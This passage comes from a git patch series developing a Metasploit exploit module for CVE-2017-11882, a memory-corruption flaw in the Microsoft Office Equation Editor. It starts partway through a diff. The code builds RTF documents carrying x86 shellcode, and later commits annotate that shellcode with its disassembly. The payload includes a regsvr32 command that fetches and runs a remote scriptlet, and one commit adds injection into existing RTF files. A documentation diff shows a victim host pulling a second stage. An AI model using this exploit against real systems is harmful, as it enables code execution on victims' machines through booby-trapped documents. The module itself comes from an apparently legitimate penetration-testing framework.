+ header << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
+ header << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
+ header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
+ header << '00000000000000000000000000000000000000000000000000000000000000000'
+ header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
+ header << '00000000000000000000000000000000000000000000000000000000000000000'
+ header << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
+ header << '00000000000000000000000000000000000000000000000000000000000000000'
+ header << '0000000000000000000000000000120002010100000003000000ffffffff00000'
+ header << '00000000000000000000000000000000000000000000000000000000000000000'
+ header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
+ header << '00000000000000000000000000000000000000000000000000000000000000000'
+ header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
+ header << '00000000000000000000000000000000000000000000000000000000000000003'
+ header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
+ header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffff01000002080000000000000000000000000000000000000000000000000'
+ header << '00000000000000000000000000000000000000000000000000000000000000000'
+ header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
+ header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
+ header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
+ header << '00000000000000000000000000000000000000000000000000000000000000000'
+ header << "00000300040000000000000000000000000000000000000000000000000000000"
+ header << "000000000000000000000000000000000000000000000000000000000000000\n"
+
+
+ shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00"
+ shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ"
+ shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09"
+ shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53"
+ shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90"
footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
- footer << '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000'
- footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000400'
- footer << '0000C50000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
- footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000'
- footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
- footer << '0000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'
- footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
- footer << '000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'
- footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C'
- footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C0000000000050000000902000000000500000002'
+ footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'
+ footer << '00000000000000000000000000000000000000000000000000000'
+ footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'
+ footer << '00000000000000000000000000000000000000000000000000000000000000400'
+ footer << '0000C5000000000000000000000000000000000000000000000000'
+ footer << '0000000000000000000000000000000000000000000000000000000000000000'
+ footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'
+ footer << '000000000000000000000000000000000000000000000000000000'
+ footer << '0000000000000000000000000000000000000000000000000000000000000000'
+ footer << '000000000000000000000000000000000000000000000000000000'
+ footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'
+ footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'
+ footer << '00000000000000000000000000000000000000000000000000000000000000000'
+ footer << '00000000000000000000000000000000000000000000000000000'
+ footer << '00000000000000000000000000000000000000000000000000000000000000000'
+ footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'
+ footer << '00000000000000000000000000000000000000000000000000000000000000000'
+ footer << '00000000000000001050000050000000D0000004D45544146494C'
+ footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'
+ footer << '500000002001C0000000000050000000902000000000500000002'
footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'
footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'
footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'
@@ -123,9 +178,6 @@ def generate_rtf
footer << "}}}\n"
footer << '\par}' + "\n"
- shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ"
- shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"
- shellcode << "\x90\x90"
payload = shellcode
payload += [0x00402114].pack("V")
@@ -133,13 +185,7 @@ def generate_rtf
payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
payload = header + payload + footer
-
- path = ::File.join(Msf::Config.local_directory, datastore['FILENAME'])
- ::File.open(path, 'wb') do |fd|
- fd.write(payload)
- fd.close
- end
- print_good("Wrote payload to #{path}")
+ payload
end
@@ -207,6 +253,6 @@ def gen_sct_file(command)
def primer
- generate_rtf
+ file_create(generate_rtf)
end
end
From 2544b4d8db4b4cad4af2d312bb32a8cde13fff88 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Tue, 28 Nov 2017 21:39:04 -0500
Subject: [PATCH 08/12] Change target name
---
modules/exploits/windows/fileformat/office_ms17_11882.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 47d486f73444..37f096f7ac11 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -33,7 +33,7 @@ def initialize(info = {})
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
- ['Automatic', {} ],
+ ['Microsoft Office Word', {} ],
],
'DefaultTarget' => 0,
'Payload' => {
From 7df46b33e88af63b98844eb4bceba16e40507c2b Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Fri, 1 Dec 2017 08:03:56 -0500
Subject: [PATCH 09/12] disassembly ASM
---
.../windows/fileformat/office_ms17_11882.rb | 49 +++++++++++++++----
1 file changed, 40 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 37f096f7ac11..6aafc49c14ec 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -22,18 +22,17 @@ def initialize(info = {})
a length of 109 bytes to be executed Affects Microsoft Office word for the latest
17 years.
},
- 'Author' => ['mumbai', 'embedi', 'BlackMathIT'],
+ 'Author' => ['mumbai', 'embedi'],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Nov 15 2017',
'References' => [
['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],
- ['URL', 'https://github.com/embedi/CVE-2017-11882'],
- ['URL', 'https://github.com/BlackMathIT/2017-11882_Generator/blob/master/2017-11882_Generator.py']
+ ['URL', 'https://github.com/embedi/CVE-2017-11882']
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
- ['Microsoft Office Word', {} ],
+ ['Microsoft Office', {} ],
],
'DefaultTarget' => 0,
'Payload' => {
@@ -131,11 +130,43 @@ def generate_rtf
header << "000000000000000000000000000000000000000000000000000000000000000\n"
- shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00"
- shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ"
- shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09"
- shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53"
- shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90"
+ shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0
+ shellcode << "\x00\x00" # 2: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x02\x00" # 4: 02 00 add al,BYTE PTR [eax]
+ shellcode << "\x9e" # 6: 9e sahf
+ shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]
+ shellcode << "\x00\x00" # d: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x00\xc8" # f: 00 c8 add al,cl
+ shellcode << "\xa7" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]
+ shellcode << "\\" # 12: 5c pop esp
+ shellcode << "\x00\xc4" # 13: 00 c4 add ah,al
+ shellcode << "\xee" # 15: ee out dx,al
+ shellcode << "[" # 16: 5b pop ebx
+ shellcode << "\x00\x00" # 17: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x00\x00" # 19: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x00\x03" # 1b: 00 03 add BYTE PTR [ebx],al
+ shellcode << "\x01\x01" # 1d: 01 01 add DWORD PTR [ecx],eax
+ shellcode << "\x03\n" # 1f: 03 0a add ecx,DWORD PTR [edx]
+ shellcode << "\n\x01" # 21: 0a 01 or al,BYTE PTR [ecx]
+ shellcode << "\x08ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl
+ shellcode << "\xB8\x44\xEB\x71\x12" # 26: b8 44 eb 71 12 mov eax,0x1271eb44
+ shellcode << "\xBA\x78\x56\x34\x12" # 2b: ba 78 56 34 12 mov edx,0x12345678
+ shellcode << "\x31\xD0" # 30: 31 d0 xor eax,edx
+ shellcode << "\x8B\x08" # 32: 8b 08 mov ecx,DWORD PTR [eax]
+ shellcode << "\x8B\x09" # 34: 8b 09 mov ecx,DWORD PTR [ecx]
+ shellcode << "\x8B\x09" # 36: 8b 09 mov ecx,DWORD PTR [ecx]
+ shellcode << "\x66\x83\xC1\x3C" # 38: 66 83 c1 3c add cx,0x3c
+ shellcode << "\x31\xDB" # 3c: 31 db xor ebx,ebx
+ shellcode << "\x53" # 3e: 53 push ebx
+ shellcode << "\x51" # 3f: 51 push ecx
+ shellcode << "\xBE\x64\x3E\x72\x12" # 40: be 64 3e 72 12 mov esi,0x12723e64
+ shellcode << "\x31\xD6" # 45: 31 d6 xor esi,edx
+ shellcode << "\xFF\x16" # 47: ff 16 call DWORD PTR [esi]
+ shellcode << "\x53" # 49: 53 push ebx
+ shellcode << "\x66\x83\xEE\x4C" # 4a: 66 83 ee 4c sub si,0x4c
+ shellcode << "\xFF\x10" # 4e: ff 10 call DWORD PTR [eax]
+ shellcode << "\x90" # 50: 90 nop
+ shellcode << "\x90" # 50: 90 nop
footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'
From c788e4e54066c9cc99a44a261a7a07bfa53199e0 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Fri, 1 Dec 2017 11:36:03 -0500
Subject: [PATCH 10/12] Update office_ms17_11882.rb
---
.../windows/fileformat/office_ms17_11882.rb | 181 ++++++++++--------
1 file changed, 104 insertions(+), 77 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 6aafc49c14ec..291fe040452b 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -46,88 +46,115 @@ def initialize(info = {})
))
register_options([
- OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"])
+ OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]),
+ OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil])
])
end
+ def retrieve_header(filename)
+ if (not datastore['FOLDER_PATH'].nil?)
+ path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}"
+ else
+ path = nil
+ end
+ if (not path.nil?)
+ if ::File.file?(path)
+ File.open(path, 'rb') do |fd|
+ header = fd.read(fd.stat.size).split('{\*\datastore').first
+ header = header.to_s # otherwise I get nil class...
+ print_status("Injecting #{path}...")
+ return header
+ end
+ else
+ header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
+ header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
+ header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
+ end
+ else
+ header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
+ header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
+ header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
+ end
+ return header
+ end
+
def generate_rtf
- header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
- header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
- header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
- header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
- header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
- header << '09000600000000000000000000000100000001000000000000000010000002000'
- header << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
- header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
- header << '07400720079000000000000000000000000000000000000000000000000000000'
- header << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
- header << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
- header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
- header << '00000000000000000000000000000000000000000000000000000000000000000'
- header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
- header << '00000000000000000000000000000000000000000000000000000000000000000'
- header << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
- header << '00000000000000000000000000000000000000000000000000000000000000000'
- header << '0000000000000000000000000000120002010100000003000000ffffffff00000'
- header << '00000000000000000000000000000000000000000000000000000000000000000'
- header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
- header << '00000000000000000000000000000000000000000000000000000000000000000'
- header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
- header << '00000000000000000000000000000000000000000000000000000000000000003'
- header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
- header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffff01000002080000000000000000000000000000000000000000000000000'
- header << '00000000000000000000000000000000000000000000000000000000000000000'
- header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
- header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
- header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
- header << '00000000000000000000000000000000000000000000000000000000000000000'
- header << "00000300040000000000000000000000000000000000000000000000000000000"
- header << "000000000000000000000000000000000000000000000000000000000000000\n"
+ header = retrieve_header(datastore['FILENAME'])
+ object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
+ object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
+ object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
+ object_class << '09000600000000000000000000000100000001000000000000000010000002000'
+ object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
+ object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
+ object_class << '07400720079000000000000000000000000000000000000000000000000000000'
+ object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
+ object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
+ object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
+ object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+ object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
+ object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+ object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
+ object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+ object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'
+ object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+ object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
+ object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+ object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
+ object_class << '00000000000000000000000000000000000000000000000000000000000000003'
+ object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
+ object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'
+ object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+ object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
+ object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
+ object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
+ object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+ object_class << "00000300040000000000000000000000000000000000000000000000000000000"
+ object_class << "000000000000000000000000000000000000000000000000000000000000000\n"
shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0
@@ -215,7 +242,7 @@ def generate_rtf
payload += "\x00" * 2
payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
- payload = header + payload + footer
+ payload = header + object_class + payload + footer
payload
end
From b7f17f5519521c4d4716c26e0c9ced5c6342bc4a Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Mon, 4 Dec 2017 16:41:27 -0500
Subject: [PATCH 11/12] fix documentation
---
.../exploit/windows/fileformat/office_ms17_11882.md | 13 +++++--------
1 file changed, 5 insertions(+), 8 deletions(-)
diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
index b6b3ae81c6c1..b1b73d04683c 100644
--- a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
+++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
@@ -1,5 +1,5 @@
-Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents. This occurs in how MS office fails to properly handle OLE objects in memory. Requires an victim
-to open an MS `.rtf` file. In addition for the payload to be executed, the user must not open as read-only. Otherwise requires no interaction beyond that from the user.
+
+Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.
## Vulnerable Application
@@ -24,18 +24,15 @@ Filename to output, and location to which should be written.
```
msf > use exploit/windows/fileformat/office_ms17_11882
-msf exploit(office_ms17_11882) > set FILENAME /home/mumbai/file.rtf
+msf exploit(office_ms17_11882) > set FILENAME msf.rtf
FILENAME => /home/mumbai/file.rtf
msf exploit(office_ms17_11882) > set LHOST ens3
LHOST => ens3
msf exploit(office_ms17_11882) > set LPORT 35116
LPORT => 35116
msf exploit(office_ms17_11882) > run
-[*] Exploit running as background job 0.
-
-[*] Started reverse TCP handler on 192.168.0.11:35116
-msf exploit(office_ms17_11882) > [*] Using URL: http://0.0.0.0:8080/e08qBLfVxgaJZPo
-[*] Local IP: http://192.168.0.11:8080/e08qBLfVxgaJZPo
+[*] Using URL: http://0.0.0.0:8080/BUY0DYgc
+[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc
[*] Server started.
[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24
[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending
From b96dac28d520a51ac655e227bec0c4b8bae84106 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Mon, 4 Dec 2017 16:42:41 -0500
Subject: [PATCH 12/12] fix info segment
---
modules/exploits/windows/fileformat/office_ms17_11882.rb | 9 ++++-----
1 file changed, 4 insertions(+), 5 deletions(-)
